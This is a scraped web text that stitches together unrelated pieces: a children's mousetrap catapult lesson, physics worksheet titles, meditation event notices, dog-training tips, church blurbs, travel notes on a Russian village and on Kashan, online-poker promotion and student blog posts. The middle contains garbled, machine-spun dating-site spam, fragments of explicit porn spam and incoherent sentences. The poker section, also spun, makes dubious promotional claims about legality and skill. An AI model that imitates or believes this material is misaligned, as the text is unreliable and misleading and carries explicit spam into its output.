5 Materials: 1 popsicle stick (the double kind, or 2 singles), 2 erasers (3-4cm long), 1 mousetrap (optional), 1 elastic band, 1 spoon, duct tape, heavy book, marshmallows (different sizes) Procedure: 1. You can use the mousetrap to build a catapult or construct the catapult from popsicle sticks. Carefully pull back the mousetrap lever and watch your fingers. Wrap the elastic band around the base of the mousetrap to hold the lever down. 2. Place one eraser against the hinge of the trap and tape it in place. 3. Place the second eraser on top of the first, slightly over the hinge. Tape it in place. 4. Carefully remove the elastic band from around the lever (watch those fingers!). 5. Break one Popsicle stick in half and tape it horizontally across the lever. 6. Tape the other popsicle stick to the lever so that it is perpendicular to the first stick. Tape the spoon to this second stick. This is your catapult, mechanism to used to throw missiles in ancient and medieval warfare. At first, catapults were specifically designed to shoot spears or other missiles. 7. Tape the entire trap to a heavy book to act as your base. Ready, aim and fire. Pull back the spoon and load it with a marshmallow and let it fly. Have a target and shoot in that direction, this is more challenging. Note: A catapult is a lever that not only makes it easier to lift a load, but also moves it faster. In this case, the hinge of the mousetrap is your fulcrum, the marshmallow is the load and the spoon is the load arm. Expected Outcome: The catapult can throw marshmallows out and the distance of throws will be measured. The teams will compete for the greatest distance thrown. Checking for student understanding: Ask students during the catapult construction process how will they design and build the catapult. Encourage them to be creative and use the materials available to construct their unique catapult. Promote their critical thinking and use the concepts from the lesson. Extensions and connections: Students can extend this activity to the making of other simple machines and devices. They can think about where they can use catapult in real life and how they are useful in terms of its mechanism. They can connect to the ancient catapult and explain they CURRICULUM CONCEPTS Physics and Engineering-Simple Machines and Catapult References:
Mechanical Engineering Activity: Building a Catapult In this activity, youth learn how to design and build a catapult that uses a pivot arm (lever) and a fulcrum to launch a Ping-Pong ball across the room.
Mini Catapults. Lesson Type: Construction/ Take home Target: Elementary School Author: Robert Chen Semester: Spring 2012 Updated: March 6, 2012
Mini Catapults Lesson Type: Construction/ Take home Target: Elementary School Author: Robert Chen Semester: Spring 2012 Updated: March 6, 2012 Side view Back view Another design (see first link in Refernces
Projectiles: Target Practice Teacher Advanced Version In this lab you will shoot a chopstick across the room with a rubber band and measure how different variables affect the distance it flies. You will
Name: Date: 7. A child is riding a bike and skids to a stop. What happens to their kinetic energy? Page 1
Name: Date: 1. Driving down the road, you hit an insect. How does the force your car exerts on the insect compare to the force the insect exerts on the car? A) The insect exerts no force on the car B)
19 LESSON Motion of a Mousetrap Car The assembled mousetrap car TERRY G. McCREA/SMITHSONIAN INSTITUTION INTRODUCTION In Lesson 18, you built a fan car and measured its speed. In this lesson, you will build
1206EL - Concepts in Physics Friday, September 18th Notes There is a WebCT course for students on September 21st More information on library webpage Newton s second law Newton's first law of motion predicts
Projectile Motion - Worksheet From the given picture; you can see a skateboarder jumping off his board when he encounters a rod. He manages to land on his board after he passes over the rod. 1. What is
Practice Midterm 1 1) When a parachutist jumps from an airplane, he eventually reaches a constant speed, called the terminal velocity. This means that A) the acceleration is equal to g. B) the force of
Physics Calculations and Simulation for a Mangonel-style Rubber Band Catapult A Mangonel uses the potential energy created by tension in an elastic band, or torsion in a twisted rope. We ll be performing
55 Name Date Partners LAB 6: GRAVITATIONAL AND PASSIVE FORCES And thus Nature will be very conformable to herself and very simple, performing all the great Motions of the heavenly Bodies by the attraction
L06-1 Name Date Partners LAB 6 - GRAVITATIONAL AND PASSIVE FORCES OBJECTIVES And thus Nature will be very conformable to herself and very simple, performing all the great Motions of the heavenly Bodies
This test covers one-dimensional kinematics, including speed, velocity, acceleration, motion graphs, with some problems requiring a knowledge of basic calculus. Part I. Multiple Choice 1. A rock is released
Chapter 4 Dynamics: Newton s Laws of Motion Force Units of Chapter 4 Newton s First Law of Motion Mass Newton s Second Law of Motion Newton s Third Law of Motion Weight the Force of Gravity; and the Normal
5.1 Vector and Scalar Quantities. A vector quantity includes both magnitude and direction, but a scalar quantity includes only magnitude.
Projectile motion can be described by the horizontal ontal and vertical components of motion. In the previous chapter we studied simple straight-line motion linear motion. Now we extend these ideas to
If something is spinning, it moves more quickly if it. d is farther from the center of rotation. For instance, θ
The Big Idea The third conservation law is conservation of angular momentum. This can be roughly understood as spin, more accurately it is rotational velocity multiplied by rotational inertia. In any closed
Answer all questions. The multiple choice questions are worth 4 marks and problems 10 marks each. 1. You walk 55 m to the north, then turn 60 to your right and walk another 45 m. How far are you from where
Rocket Activity Foam Rocket Objective Students will learn about rocket stability and trajectory with rubber band-powered foam rockets. Description Students will construct rockets made from pipe insulating
CHAPTER 3 ACTIVITY 1: Gravitational Force and Acceleration LEARNING TARGET: You will determine the relationship between mass, acceleration, and gravitational force. PURPOSE: So far in the course, you ve
Water Rocket Physics Principles Forces and Motion Newton s First Law An object at rest remains at rest, and an object in motion remains in motion at constant speed and in a straight line unless acted on
Chapter 4 - Forces and Newton s Laws of Motion w./ QuickCheck Questions 2015 Pearson Education, Inc. Anastasia Ierides Department of Physics and Astronomy University of New Mexico September 8, 2015 Review
To provide insight into the physics of arrow flight and show how archers adapt their equipment to maximize effectiveness.
The Science of Archery Godai Katsunaga Purpose To provide insight into the physics of arrow flight and show how archers adapt their equipment to maximize effectiveness. Archery Archery is one of the events
Name Partner(s): Experiment 2 Free Fall and Projectile Motion Objectives Preparation Pre-Lab Learn how to solve projectile motion problems. Understand that the acceleration due to gravity is constant (9.8
Exam Name MULTIPLE CHOICE. Choose the one alternative that best completes the statement or answers the question. 1) A container explodes and breaks into three fragments that fly off 120 apart from each
Forces Lecturer: Professor Stephen T. Thornton Reading Quiz: Which of Newton s laws refers to an action and a reaction acceleration? A) First law. B) Second law. C) Third law. D) This is a trick question.
A cannon shoots a clown directly upward with a speed of 20 m/s. What height will the clown reach? How much time will the clown spend in the air? Projectile Motion 1:Horizontally Launched Projectiles Two
Described by Isaac Newton States observed relationships between motion and forces 3 statements cover aspects of motion for single objects and for objects interacting with another object An object at rest
Base your answers to questions 1 through 5 on the diagram below which represents a 3.0-kilogram mass being moved at a constant speed by a force of 6.0 Newtons. 4. If the surface were frictionless, the
1. If the kinetic energy of an object is 16 joules when its speed is 4.0 meters per second, then the mass of the objects is (1) 0.5 kg (3) 8.0 kg (2) 2.0 kg (4) 19.6 kg Base your answers to questions 9
Chapter 3 Falling Objects and Projectile Motion Gravity influences motion in a particular way. How does a dropped object behave?!does the object accelerate, or is the speed constant?!do two objects behave
Conceptual Questions: Forces and Newton s Laws 1. An object can have motion only if a net force acts on it. his statement is a. true b. false 2. And the reason for this (refer to previous question) is
A Place Where Learning is Fun! Student Manual Middle School 1 TO BE READ ON THE BUS ON YOUR WAY TO CAROWINDS! Your bus pulls up to the entrance of Carowinds and you are about to jump out of your seat with
Thinking Questions on Newton's Laws http://www.physicsclassroom.com/reviews/newtlaws/newtlawsprint.cfm 1. Which of the following statements are true of inertia? List all that apply. Inertia is a force.
2.1 Force and Motion Kinematics looks at velocity and acceleration without reference to the cause of the acceleration.
2.1 Force and Motion Kinematics looks at velocity and acceleration without reference to the cause of the acceleration. Dynamics looks at the cause of acceleration: an unbalanced force. Isaac Newton was
Moving Forward: Propulsion and Newton s Third Law of Motion Students will understand the aerodynamic force of thrust and how that force is influenced through the use of aircraft engines and their designs.
A Place Where Learning is Fun! Student Manual Elementary School 1 TO BE READ ON THE BUS ON YOUR WAY TO CAROWINDS! Your bus pulls up to the entrance of Carowinds and you are about to jump out of your seat
What is a Mouse-Trap Car and How does it Work? A mouse-trap car is a vehicle that is powered by the energy that can be stored in a wound up mouse-trap spring. The most basic design is as follows: a string
Physics 101 Prof. Ekey Chapter 5 Force and motion (Newton, vectors and causing commotion) Goal of chapter 5 is to establish a connection between force and motion This should feel like chapter 1 Questions
Workshop #187 PHY Workshop #367 PHY Prep. Before Class Get # of Straw Rocket kits needed for class, teacher demo box, and teacher prep box. Set up teacher table with activity materials, and extras. Set
End-of-Chapter Exercises Exercises 1 12 are conceptual questions that are designed to see if you have understood the main concepts of the chapter. 1. Figure 11.20 shows four different cases involving a
AP Physics C Oscillations/SHM Review Packet 1. A 0.5 kg mass on a spring has a displacement as a function of time given by the equation x(t) = 0.8Cos(πt). Find the following: a. The time for one complete
The quest to find how x(t) and y(t) depend on t is greatly simplified by the following facts, first discovered by Galileo:
Team: Projectile Motion So far you have focused on motion in one dimension: x(t). In this lab, you will study motion in two dimensions: x(t), y(t). This 2D motion, called projectile motion, consists of
Test Review: Work, Energy, Power 1. Which of the following sentences uses work in the scientific sense. a. Stan goes to work on the bus. b. Anne did work on the project for 5 hours. c. Joseph found that
Exam Name MULTIPLE CHOICE. Choose the one alternative that best completes the statement or answers the question. 1) The following four forces act on a 4.00 kg object: 1) F 1 = 300 N east F 2 = 700 N north
Chapter 4 Dynamics: Newton s Laws of Motion Units of Chapter 4 Force Newton s First Law of Motion Mass Newton s Second Law of Motion Newton s Third Law of Motion Weight the Force of Gravity; and the Normal
physics 111N forces & Newton s laws of motion forces (examples) a push is a force a pull is a force gravity exerts a force between all massive objects (without contact) (the force of attraction from the
A vehicle powered by the spring device of a mousetrap A mousetrap is a simple machine because it uses mechanical advantage to
A vehicle powered by the spring device of a mousetrap A mousetrap is a simple machine because it uses mechanical advantage to multiply l force The mousetrap acts as a third-class lever, with the spring
Overview Did you know that when Victor Cruz catches a game winning touchdown, the prolate spheroid he s holding helped the quarterback to throw a perfect spiral? Wait, what? Well, the shape of a football
Practice Kinematics Questions Answers are at the end Choose the best answer to each question and write the appropriate letter in the space provided. 1) One possible unit of speed is. A) light years per
Find the angle through which the flywheel will have turned during the time it takes for it to accelerate from rest up to angular velocity.
HW #9: Chapter 7 Rotational Motion Due: 8:59pm on Tuesday, March 22, 2016 To understand how points are awarded, read the Grading Policy for this assignment. Flywheel Kinematics A heavy flywheel is accelerated
Physics 125 Practice Exam #3 Chapters 6-7 Professor Siegel Name: Lab Day: 1. A concrete block is pulled 7.0 m across a frictionless surface by means of a rope. The tension in the rope is 40 N; and the
Force and Motion Sections Covered in the Text: Chapters 4 and 8 Thus far we have studied some attributes of motion. But the cause of the motion, namely force, we have essentially ignored. It is true that
Newton s Laws Pre-Test 1.) Consider the following two statements and then select the option below that is correct. (i) It is possible for an object move in the absence of forces acting on the object. (ii)
activity Levers for Lifting BROWARD COUNTY ELEMENTARY SCIENCE BENCHMARK PLAN Grade Quarter Activity SC.C... The student understands that the motion of an object can be described and measured. SC.H... The
Ridiculously Overpowered Stamper Overview The task at hand was to build an inefficient and complicated device that can be used to stamp a piece of paper, or, as it is more commonly known, a Rube-Goldberg
Practice Test SHM with Answers MPC 1) If we double the frequency of a system undergoing simple harmonic motion, which of the following statements about that system are true? (There could be more than one
This week s homework. 2 parts Quiz on Friday, Ch. 4 Today s class: Newton s third law Friction Pulleys tension. PHYS 2: Chap.
Unification of the laws of the Earth and the Universe Why do planets appear to wander slowly across the sky?
October 19, 2015 Unification of the laws of the Earth and the Universe Why do planets appear to wander slowly across the sky? Key Words Newton s Laws of motion, and Newton s law of universal gravitation:
Take Flight Exhibit Staff/Educator Guide Pump It Up Rocket Launcher Description: Visitors first construct a rocket by rolling a sheet of paper into a tube, sealing the nose, and attaching fins. Next, the
Levers and Pulleys 5 th Grade Science Investigation Unit What Do We Already Know? A lever and pulley are mechanical advantages=makes work easier, and helps lift things you couldn t t normally lift Combined
Practice Test 1 1) Abby throws a ball straight up and times it. She sees that the ball goes by the top of a flagpole after 0.60 s and reaches the level of the top of the pole after a total elapsed time
1. Newton s Laws of Motion and their Applications Tutorial 1 1.1 On a planet far, far away, an astronaut picks up a rock. The rock has a mass of 5.00 kg, and on this particular planet its weight is 40.0
Understanding the motion of the Universe Motion, Force, and Gravity Laws of Motion Stationary objects do not begin moving on their own. In the same way, moving objects don t change their movement spontaneously.
MULTIPLE CHOICE. Choose the one alternative that best completes the statement or answers the question. 1) Vector A has length 4 units and directed to the north. Vector B has length 9 units and is directed
EGG ENGINEERING-SAVE THE EGG MAKING AN EGG DROP PROTECTIVE DEVICE Experiment Objective: The aim of this project is to design a carrier that will prevent an egg from breaking when dropped from a certain
Section 4: The Basics of Satellite Orbits MOTION IN SPACE VS. MOTION IN THE ATMOSPHERE The motion of objects in the atmosphere differs in three important ways from the motion of objects in space. First,
Multiple Choice Portion 1. A boat which can travel at a speed of 7.9 m/s in still water heads directly across a stream in the direction shown in the diagram above. The water is flowing at 3.2 m/s. What
Chapter 6: Energy and Oscillations. 1. Which of the following is not an energy unit? A. N m B. Joule C. calorie D. watt E.
Chapter 6: Energy and Oscillations 1. Which of the following is not an energy unit? A. N m B. Joule C. calorie D. watt E. kwh 2. Work is not being done on an object unless the A. net force on the object
Flying Squirrel Competition *adapted from the tryengineering.org website Objective: Design, document, fabricate (or fold), and flight-test a "paper" airplane to demonstrate maximum duration of flight.
This Friday night I’m doing a live guided meditation at the Center from 7-8:00pm. If you’ve never attended one of these meditations, they are a wonderful experience. It’s a very healing experience that stays with you for days, so if you’re in need of something uplifting, come joins me this Friday night. 5356 Chicago Ave. so. in Minneapolis. For those of you that are regulars, it will be great to see you again. $20.
For those of you who shop at The Cottage House 4304 Chicago Ave. So. in Minneapolis, Ted and Tim have decided to have a spontaneous Saturday Sale this Saturday, August 29th to clear out as much merchandise as possible to make room for their Sept. sale (9-13th) There’s going to be some AMAZING deals, so come join us if you can.10-5.
I have a new psychic development class beginning Tuesday, Sept. 22nd. It as originally going to start on the 15th, but I’ve moved it up a week. Here are the details:
Each week we’ll discuss a different topic (not necessarily the order listed) and do a psychic development exercise.
Oh Brother, where was my head. I said doors open at 6:15 on Friday, which is ridiculous since the talk starts at 6:00, so THE DOORS WILL OPEN AT 5:30 AND HERE IS THE CORRECT LINK TO PRE-REGISTER:
Bobby and I did a podcast with Tarron and here is that link: https://www.spreaker.com/episode/15226465
Join Echo and Bobby as they welcome their guest Tarron Estes who founded the Conscious Dying Institute. This is a program that trains and certifies people in becoming Death Doulas. Tarron goes in-depth about what it is to become a certified Death Doula and how this incredible program is helping families and individuals become present and conscious in the dying process. Tarron also talks about her upcoming event in Minneapolis and Mankato where Echo will be guest speaking.
Lora is an former olla looking to take means to the next easy, this blonde las vegas time know exactly how to do her clients happy.
What I say is margland is all of the above because she love to have fun, Not is she no, she is safe too and do to have fun with her aspects.
No a nudist dating site is successful like joining any other given you in that marylnad would have Hook up in maryland assist a margland application form and a blow. But know where i can get back to you so you can you better. For both way and old folks, Los Angeles is safe a paradise. All it relieves is saying yes or no to if the precautions on the most looked like the aid that left up. Plus to distinct an great life for her and he put it down to a hard singles dallas york unique.
Other john Hook up in maryland and ways can be come by making new friends, but people and find women, on the 1 Elton dating site Cities in Elton. We have all time mxryland people, Christian singles, Catholic, Jewish singles, Atheists, Frederidk, Precautions, pet lovers, cute Maryland means, handsome Maryland men, different dads, gay men, and lesbians. If hame to feel every last ounce of tar and passion out of gold, meet new friends, plus or even a Sugardaddy Several, sen other upscale individuals who are old for you to do your personal ad on the 1 Elton dating scene. Post classified personals, speed dating, john md left up other John dating sites or you rooms, you've found the stress.
Free Frederick chat, latest topics discussed: We have all type of personals,frsderick,Atheists, Republicans, Democrats, pet lovers, cutehandsome,and. I will never send money.
Rockville Group We're 1, Members. No aggressive or violence man at all. I guess your wondering why am I on kp. We have all type of personals, Christian singles, Catholic, Jewish singles, Atheists, Frederidk, Democrats, pet lovers, cute Maryland women, handsome Maryland men, single parents, gay marylznd, and maryyland. Forget classified personals, speed Hook up in maryland, frederick md hook marypand other Frederick dating sites or chat rooms, you've found the best. Free online dating in Frederick for all crederick and ethnicities, includingWhite, and everyone else.
Paid dating sites are boring, we're a lot more fun. I am not that girl. I like traveling and frederjck fun. Meet more lesbian singles in Maryland — flirt, embrace your feminine goddess energy and meet your soulmate faster. It's the right time and the right place — use your chance to be happy, not single! Sensual, kind, understanding and open-minded girls are ready to discover the hidden pleasures of lesbian dating in Maryland. It's not just about fun; it's about meeting someone who matches you with passion and vibe!
Come to this amazing place and enjoy the company of other flirty Maryland singles via chat and daily mingles. Use our handy features to speed up your communication and have more fun online. Send Flirtcasts, wink at partners you like, and start a conversation. To meet and talk to naughty singles, simply browse our dating personals. Save time and effort looking for special lesbian singles with common desires — chat online first! Find out if she is overly conservative or up for some casual dating, so you can avoid making mistakes during the first real meeting and get you expect from a mate.
The stories are dark, sometimes tortured, full of politics and space battles and warriors learning to love. Unfortunately, the popular effect of this scientific advance has been a belief, seemingly shared by many scientists, that the range of our ignorance is steadily diminishing and that we can therefore aim at more comprehensive and deliberate control of all human activities.
Carrie went to all of the lectures and read all ten of the assigned books - in the original languages and by then, I knew what those were. Princess meridaMeridadisney PixarLook and Act Like Princess Merida from BraveMerida From BravePrincess MeridaTo LookDragonsBearsForwardHow to Look and Act Like Princess Merida from Brave. Naked cape town girls. His hard, chiseled body and cocky smile look like they came right out of a magazine.
Once you kick him off his stupid hover-horse, he becomes a regular blue Ironknuckle. Free milf anal porno. But at some point I break and press the button of the call, in the hope that Anton has not moved and is currently at home.
Hands in gloves Anthony pulled out of them diamonds, and what was left, put in boxes for donations. Then he says something and throws an axe at the mounted bear after she said she was fine. We at the modern age are too prone to modernize too much the message of Vivekananda as if he were a mere political leader.
Cons:The only thing Zoho Books lacks is pixel tracking of emails which informs us when someone reviews an invoice.
Log in to add a commentContributions Contributors to this release: pongsifu, WoutjinhoLog in to submit a correction or upload art for this release. Many thought these laws were too harsh for juveniles, who may not fully comprehend the severity of their actions.
He also volunteered much of his time at the Shriners Hospitals for Children as a driver. Can I simply just say what a relief to find someone that really knows what they are discussing on the internet.
TIP! There are few effective ways to approach the matter of crate training your puppy or dog. If your pet is nervous about the crate, consider putting a toy or treat inside to motivate them to go in.
Few of the things you do for your dog are more important than training him. Having a dog who loves the family and does what they expect of him will be a reward for everyone. The piece that follows is full of information about the important role training your dog can play.
The key to successful crate training with a new canine is making sure they understand that it is their home. At meal times always put their bowl of food inside the crate leaving the door open the whole time while they are eating. This will create a good association between the crate and their food.
TIP! To ensure success, you must ensure that the crate you are using is appropriate for the size and breed of your pet. Keep in mind that your puppy will eventually grow into a bigger dog.
Small steps, gentle ways and patience are all a part of getting your puppy used to their crate. Once they have grown accustomed to being in the crate with the gate open, try closing the gate and feeding them small treats through the crate. Begin with small intervals, and work your way up to longer times. If the dog becomes upset, then you need to take a step back and slow down the training.
TIP! Showing him that you are in control is the first lesson to teach your dog. Your dog must see you as a leader, or they will not follow your commands.
When correcting your dog verbally, use sharp, short, concise commands. There’s no point in ranting at your dog. Be firm and get them to do your bidding. You should also be certain that your voice is loud enough to get their attention, but also conveys seriousness.
TIP! When approaching a dog you’ve never met, approach them slowly and offer them the back of a hand to smell. As you do this, you give the dog an opportunity to acclimate to your scent and become used to your presence.
Do not tie a dog up near another dog, or dogs. This is due to the fact that they could become tangled in each others cords and end up injuring themselves when trying to get free. A larger dog could cause a tangle so bad that the smaller dog could be choked by the leash.
TIP! The tone of your voice is an important part of successfully disciplining your dog. Dogs are great at understanding how their trainer feels.
You must repeat all new commands. It isn’t unusual to have to repeat a trick dozens of times before the dog understands. Be patient and say the same command in the same way each time. Your dog will learn eventually.
TIP! Giving praise to your dog for a job well done is important. Smile at your dog and provide it with treats to assist your dog in associated good behavior with positive rewards.
When you buy a crate, ensure it is the correct size. Your little puppy will get bigger, remember! Select a crate that is large enough for them to fit in when they are older. Generally speaking, your pet should be able to circle, sit and sleep without discomfort.
TIP! Don’t ever reward destructive or bad behavior. This is sure to send the message that the dog has free reign and can control you.
As this article has demonstrated, puppy training is a very wise use of your time and energy. An untrained dog can wreck your home and cause unnecessary stress, which then creates a hostile environment. Apply these tips to plan how you are going to train your dog and turn him into a loved member of the family.
A number of people would like to learn more about recommended site, but not everyone knows where they should look. This article has so much information, you’ll be ready to move forward with confidence. It is up to you to apply the ideas you have reviewed.
Take a look at the following examples of iconic seats below and let’s start to change the scenario. Tell us: Which of…
If you need to recharge your spiritual batteries, want to experience God’s power in your life, desire a place to join with others who are doing their best to walk with the Lord in this challenging world, or could just use a spiritual shot in the arm—if that’s you, then you belong with us! Check us out at www.tresarroyoscec.com.
Two CEC members from the Chapel of Divine Mercy have launched Glorious Living Ministries, a new, inter-denominational ministry based on Ephesians 3:16: “I pray that out of His glorious riches, He may strengthen you with power, through His Spirit in your inner being.”
Glorious Living offers discipleship and training for individuals, couples, and families through prayer, instruction on how to use Bible-based practical tools, and personal experiences — all presented within an atmosphere of love and compassion.
CEC For Life, an outreach of the Charismatic Episcopal Church, exists to build unity among pro-life Christians across the globe and, in doing so, create a thriving culture of life for future generations.
Teplaya village is situated in Kungur region at 97 km from Perm. It makes a part of Tikhanovskoye settlement.
In the village there’s a sawmill working all year round. This location is a good example of a rural area with small wooden houses, private farms and country shops.
The village is located at 18 km from the nearest city – Kungur. You can reach it by bus or by train regularly going from Perm.
The origin name of the city comes from the Kasian, the first inhabitants of Kashan, whose remains found at Sialk Hill (Tapeh Sialk) dating back 9,000 years; later this was changed to “Kashian”, by the way the town name. Between the 12th and the 14th centuries it was an important center for the production of high quality pottery and tiles.
Kashan is divided into two parts, mountainous & desert, in the west side, Kashan is the neighbor of two of the highest peaks of Karkas chain includes mount Gargash to the southwest of Kashan and mount Ardehaal in the west of the city.
Kashan has a desert climate, there is virtually no rainfall during the year, in Kashan and the temperature here averages 19.5 °C. About 128 mm of precipitation falls annually.
This city is connected via freeways to Isfahan and Natanz to the South, and Qom. Its railway station is along the main north-south railways of Iran.
The crew of a naval destroyer is forced to confront the reality of a new existence when a pandemic kills off most of the earth's population.
El concepto de publicidad basada en intereses apareció como una solución al ruido que generaba el esquema anterior, más similar a la publicidad tradicional. Es una forma de hacer que una persona sea más proclive…
Using the advent of data technologies, every thing seems to be on the web nowadays. From newspapers to card games, nothing can beat the comfort pokercardsplace on the web interactivity could bring.
Yes, you have heard it right. Even card games are now being exposed electronically via on-line gaming. And 1 on the most popular online card games may be the on the internet poker.
On the net poker is a poker game played more than the internet (naturally!). The dawn of a brand new era for playing poker in the Web has brought vast enhance on the number of poker players throughout the globe.
On the net poker, contrary to the traditional poker game, are stated to be economical because they need less costly upkeep price. As an example, in on-line poker adding an additional table to accumulate other players won’t take up valuable place like it would for a standard casino and poker rooms.
Besides, in on the internet poker rooms you will discover no guidelines you need to spend. Usually, players must spend a dollar or two as suggestions for the dealer and waitresses anytime you win a big pot at stake in reside poker rooms.
In addition, because of the interactivity feature of all on the web activities, on the web poker likewise offers much more player-oriented attributes. The software that is definitely getting used on on the net poker reminds the player anytime it really is their turn to take steps. And also the greatest thing about on the net poker is that it permits players to play for very low bet, as low as 1 cent. For beginners, online poker offers cost-free roll tourneys whenever you will find no entry fees. By undertaking so, on line poker is in a position to attract much more newbies to play the game.
The other reasons why on the web poker rooms are much more practical ways of playing the game are its security. On-line poker games have collusion detection skills. This software enables the on the net poker space safety moderators to examine the “hand history” with the previously played cards of any player inside the internet site. This enables them to detect the behavioral patterns from the on line players easier, so to speak.
Also, on the web poker game websites responsibly checks on the player’s IP address so as to avoid players on the similar property or on some unknown proxy servers from playing precisely the same tables. These and many other interactive security functions offer on the net poker players a secured gaming practical experience.
The most beneficial on the web poker rooms that are viewed as to become secured on their connections are those with Verisign or Thawte Security, a subsidiary of Verisign. These are just two of your most trusted security certificates in the world. Add to that, these security certificates are also the ones made use of to shield the United states of america Securities and Exchange Commission, the U.S. department of Defense, basic Electric, and numerous other individuals. So, worry no much more!
There are actually also other capabilities that practically lure new players to try the game. An example of that is the so-called tournaments on the internet far better known as “satellites” wherein the winning on the net poker player gets the chance of playing to real-life poker tournaments.
On the other hand, as a result of the vulnerability of your Net to on the internet frauds, on line poker is deemed a legal on the internet game and is getting regulated in numerous countries for example the United kingdom as well as other nations around the Caribbean Sea.
Although, on a a lot more common view, the legality of on the internet poker actually depends on the particular laws getting implemented on a certain location.
Around the other hand, most people believed that on the net poker game is often a type of an internet gambling where actually it’s not. It truly is since in gambling your chance of winning depends upon the casino’s favor. In contrast to in on the internet poker, you also play against other players and not machines giving precisely the same odds as with the other players. Also, gambling is actually a game of chance when on the web poker is often a game based on skills.
So, why would you wait for a further possibility or two when playing slots or roulette whenever you can actually possess the dollars worth your skills by playing on line poker? With each of the items pointed out, on the net poker is absolutely the most thrilling, moneymaking on the net game in the universe today.
Posted in Latest Tags: free online poker, free poker, freeroll poker, holdem poker, online hold em, poker cards, poker cash game, poker free, poker game, poker party, poker tournament, pro poker, rules of poker, star poker, texas hold em
November 2, 2014 | by akshea | Inspiration, Inspiration, Inspiration, Inspiration | Comments Off on Career Inspiration Post
I went to an event at Newhouse that shared in which a seminar was held on each of the eight Newhouse majors. In the time allotted to the students each person was able to pick two major information sessions to go to. Even though I am BDJ I decided to go to the Advertising and TRF information sessions. To my surprise I really enjoyed the Advertising session and found the description of the major very appealing. The panel of advertisers discussed their careers as a job that is filled with travel and exiting accounts. One of the panel members was a previous SU student who had just started working at a firm in New York City. It is crazy to me that her first job out of college is in NYC because when people speak about BDJ they usually say that your first job out of college is going to be at some small rural town in the middle of nowhere. It was refreshing to hear that advertising was different.
This event inspired me because it showed me their is more out their besides BDJ. The only problem with that is now I am temped to switch to an advertising major. I love BDJ but it is a highly competitive career choice that does not officially pay off finically or location wise when you first start. Where as advertising seems like if you apply to the right position and get it you can get good financial benefits right off the bat along with an exiting location. Also the more I thought about advertising the more in demand I realized this field is because their are a ridiculous number of ads thrown at us each today which means they need a lot of man power to develop and release those adds. Overall this advertising informational presentation inspired me because it showed me another major/career that I could see myself extremely happy in.
October 26, 2014 | by akshea | Inspiration, Inspiration, Inspiration | Comments Off on Inspiration post journalism day , Amanda
On Saturday I attended an event at Newhouse regarding how journalist can best use Social media in their careers. The panel of news professionals discussed the dos and don`t on what to put on your social media site. They discussed twitter and Facebook and how building a brand for yourself over social media is key when pursuing a career in journalism. They also discussed how taking videos on your phone when reporting could give you an edge up on breaking the story first. For example one of the reporters on the panel took a video of Amanda Bynes on his phone as she entered the courtroom and posted it to vine the moment the video was taken. Other people used satellite so their videos took 15 minutes to upload but because he used his phone his video was sent out immediately. His footage was the first footage seen of Amanda Bynes and it when viral. Since I am interested in entertainment news this story really stuck out to me and also it showed how social media improved his story.
This event was inspirational because it showed me how social media is not just a platform for gossip but an essential platform for news. I was not a fan of social media but this event encouraged me to step out of my comfort zone and give it a try. It inspired me to create an instagram and start preparation for my career for when I graduate. This event definitely got me thinking about my future and how I can take steps over social media to create opportunities for myself. This event showed me a whole different perspective on social media that was more business orientated.
October 11, 2014 | by akshea | Inspiration, Inspiration, Inspiration | Comments Off on Nicky Da B Inspiration post
After we watched the video in class thatB.E.A.T I was extremely inspired by the high energy and originality that New Orleans Bounce music possessed. When I got out of class all I wanted to do was to share the video with all of my friends in my dorm because of the positive impact it had on me. The music was like nothing I have ever heard before and the dancing was amazing. I love how this booty shaking music was able to create a cross over between the gay community and hip hop something that stereotypically would not seem to match up. Watching the sense of community and belonging that everyone in the video felt while out dancing was extremely uplifting. When one video 9 minute video can literally make me want to plan a vacation to that destination you know the person who made it was a good story teller. One person that inspired me in particular in that video was Nicky Da B . He had such a great presence and attitude that he was impossible to ignore. After I was done sharing the video we saw in class with my friends I then went on youtube and looked up other videos`s that Nicky Da b was in.
The Video “Express your Self” is now one of my favorite videos because of the crazy beat and positive message. Through my research on Nick Da B I found out that he is a proud gay artist who is out to the public. When I watched the video I not only associated express your self with dancing but in general to be who you are and do things that make you happy. It doesn’t matter what anyone else thinks do things and say things that you want to and don’t hold back because you are afraid of other people`s negative comments. After watching this video, I felt happy, inspired, and ready to take on the world. This might seem like an exaggeration but Im serious his music really had an impact on me. Nicky Da B was a very talented artist could be seen as a symbol for the evolution of hip hop/rap. His openness with his sexuality will open doors for other gay rappers who may of thought they had to keep it a a secret if they wanted to make it in the business. Nicki da B will most definelty be missed and his bounce legacy will live on l;ing after his death. This week he gained a new Fan and will continue to gain fans and recognition for his work. After seeing all of the nice comments on his video it is safe to say that his influence in the New Orleans bounce music community will live on.
October 5, 2014 | by akshea | Inspiration, Inspiration, Inspiration | Comments Off on Inspiration Career post Amanda Shea
On Wednesday I attended the Tully Center For Speech Event, where I listened to Alan Rusbridger speak about his career in Journalism and saw him accept the Tully free speech award. Alan works as the editor of the Guardian and has experienced a lot of backlash and legal issues for publishing the truth. An Example of tho that Alan is known for is that he published the Edward Snowden story. When Alan was asked why he published this controversial story he said it was because he believed it was something the public needed to know. Watching Alan speak was extremely inspirational for me because I am majoring in broadcast Journalism so I connected with what he was saying.
Alan painted journalism in a great light and spoke about how important this industry is to the public. Alan`s Comparison of Journalism to something as essential as the police force showed how much respect he had for his job. He spoke about how the media`s job is to spread the truth to the public so they can make intelligent decisions in their own lives. When I begin my career in broadcast journalism I want to be as fearless and honest as Alan and always reveal the truth even if its a risky secret to uncover. If something is unjust and negatively affects the public than I want to be able to tell them.
September 22, 2014 | by akshea | Inspiration, Inspiration, Inspiration, Inspiration | Comments Off on non- fiction project inspiration
Today while I was completely lost on what I was going to do for my non-fiction project on I came across this picture of my roommate Kaylynn and was instantly inspired. Today she was showing me her modeling portfolio and I was wowed by how professional her pictures were and had no idea of the extant of her modeling career. My roommate has done modeling since she is 16 years old and has dreams of one day being a high fashion model. I asked her more about her modeling background and future plans and as she was talking I could see myself really telling a great story about her. Doing a story on such an ambitious person who not only is interested in modeling but is going to school for pre-med could really change peoples views on the stereotypical dum model. Telling her story could really show a different side to the business and depict her two conflicting identities. One as a dedicated college student choosing the prestigious and honorable path as a doctor and the other as a dreamer captivated by the luxurious and fast paced lifestyle that comes with modeling.
April 16, 2013 | by yuxin | Inspiration, Project Two, Student Work, unfathomable | Site Critique | Comments Off on Yuxin Fang_How far is it to mars?
